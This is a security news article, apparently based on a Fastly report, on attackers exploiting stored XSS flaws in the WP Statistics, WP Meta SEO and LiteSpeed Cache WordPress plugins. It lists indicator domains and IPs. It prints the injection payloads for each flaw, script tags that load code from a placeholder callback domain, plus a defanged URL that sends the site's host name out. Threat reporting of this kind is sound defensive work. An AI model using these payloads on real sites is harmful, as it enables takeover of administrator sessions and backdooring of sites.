In recent cyberattacks, hackers are actively exploiting stored cross-site scripting (XSS) vulnerabilities in various WordPress plugins.
According to Fastly reports, these vulnerabilities, identified as CVE-2024-2194, CVE-2023-6961, and CVE-2023-40000, are targeted due to inadequate input sanitization and output escaping, allowing attackers to inject malicious scripts.
The WP Statistics plugin (version 14.5 and earlier) is vulnerable to stored cross-site scripting via the URL search parameter.
utm_id="><script src="https://{CALLBACK_DOMAIN}/"></script> This vulnerability allows unauthenticated attackers to inject arbitrary web scripts via the URL search parameter.
All-in-One Cybersecurity Platform for MSPs to provide full breach protection with a single tool, Watch a Full Demo
These scripts are executed whenever a user accesses an injected page.
The attacker repeatedly sends requests containing this payload to ensure it appears on the most visited pages, adding the “utm_id” parameter to these requests.
The WP Meta SEO plugin (version 4.5.12 and earlier) is susceptible to stored cross-site scripting attacks via the Referer HTTP header.
Referer: <script src="https://{CALLBACK_DOMAIN}/"></script> The attacker sends this payload to a target site, particularly to a page that generates a 404 response.
The WP Meta SEO plugin inserts this unsanitized header into the database to track redirects.
When an administrator loads the 404 & Redirects page, the script pulls obfuscated JavaScript from the callback domain and executes it in the victim’s browser.
WordPress’s LiteSpeed Cache plugin (version 5.7.0.1 and earlier) is vulnerable to stored cross-site scripting through the ‘nameservers’ and ‘_msg’ parameters.
result[_msg]=<script src="https://{CALLBACK_DOMAIN}/"></script> The XSS vulnerability is triggered when an admin accesses any backend page because the XSS payload is disguised as an admin notification, causing the malicious script to execute using their credentials for subsequent malicious actions.
The contents of the malicious JavaScript perform the following actions:
The malicious PHP performs the following:
<script src="https://{TRACKING_DOMAIN}/"></script> hxxp://ur.mystiqueapi[.]com/?ur=<$_SERVER['HTTP_HOST']>
CVE-2024-2194
The domain media.cdnstaticjs[.]com is linked to the exploitation of CVE-2024-2194.
We have observed attacks from 17 different IP addresses targeting this vulnerability, primarily originating from AS202425 (IP Volume Inc.) and AS210848 (Telkom Internet LTD), with a concentration of attacks coming from the Netherlands.
CVE-2023-6961
The domain idc.cloudiync[.]com is linked to the exploitation of CVE-2023-6961.
To date, over 5 billion requests have attempted to exploit this vulnerability from a single IP address, which originates from the autonomous system AS202425 (IP Volume Inc.).
Additionally, since May 16th, we have observed media.cdnstaticjs[.]com being used in attack payloads targeting this vulnerability. This domain is also used in attacks targeting CVE-2024-2194.
CVE-2023-40000
The domains cloud.cdndynamic[.]com, go.kcloudinc[.]com, and cdn.mediajsdelivery[.]com are associated with the exploitation of CVE-2023-40000.
The last observed attack using the domain cdn.mediajsdelivery[.]com was on April 15th. Since then, we have only seen cloud.cdndynamic[.]com and go.kcloudinc[.]com being used in attacks targeting this vulnerability.
Unlike the previous two vulnerabilities, the attacks exploiting CVE-2023-40000 are more distributed across different IP addresses and autonomous systems (AS).
We have observed attacks from 1664 distinct IP addresses, primarily originating from AS210848 (Telkom Internet LTD) and AS202425 (IP Volume Inc.).
A significant concentration of attacks came from the Netherlands.
The domain assets.scontentflow[.]com was registered shortly after CVE-2023-6961 was publicly released, and this is the primary domain being written into infected sites in payloads coming from idc.cloudiync[.]com.
Web pages containing this payload are minimal according to our searches, indicating limited infection success thus far with this payload.
The domain cache.cloudswiftcdn[.]com was registered before all three CVEs being publicly released.
The payloads observed referencing this domain are structured similarly to other observed payloads but add over 40 additional themes to attempt to backdoor.
There are over 3000 pages containing this script, according to searches on PublicWWW.
This, combined with the earlier registration time, might indicate a longer period of use or infection time.
media.cdnstaticjs[.]com
cloud.cdndynamic[.]com
idc.cloudiync[.]com
cdn.mediajsdelivery[.]com
go.kcloudinc[.]com
assets.scontentflow[.]com
cache.cloudswiftcdn[.]com80.82.76[.]214
31.43.191[.]220
94.102.51[.]144
94.102.51[.]95
91.223.82[.]150
185.7.33[.]129
101.99.75[.]178
94.242.61[.]217
80.82.78[.]133
111.90.150[.]154
103.155.93[.]120
185.100.87[.]144
185.162.130[.]23
101.99.75[.]215
111.90.150[.]123
103.155.93[.]244
185.209.162[.]247
179.43.172[.]148
185.159.82[.]103
185.247.226[.]37
185.165.169[.]62Get special offers from ANY.RUN Sandbox. Until May 31, get 6 months of free service or extra licenses. Sign up for free.
Cybercriminals are increasingly exploiting search engine optimization (SEO) techniques and paid advertisements to manipulate search…
Cybersecurity experts have unearthed an intricate cyber campaign that leverages deceptive websites posing as the…
Hackers are exploiting what's known as "Dangling DNS" records to take over corporate subdomains, posing…
Security researchers and cybersecurity experts have recently uncovered new variants of the notorious HelloKitty ransomware,…
The RansomHub ransomware group has emerged as a significant danger, targeting a wide array of…
Threat actors are increasingly using email bombing to bypass security protocols and facilitate further malicious…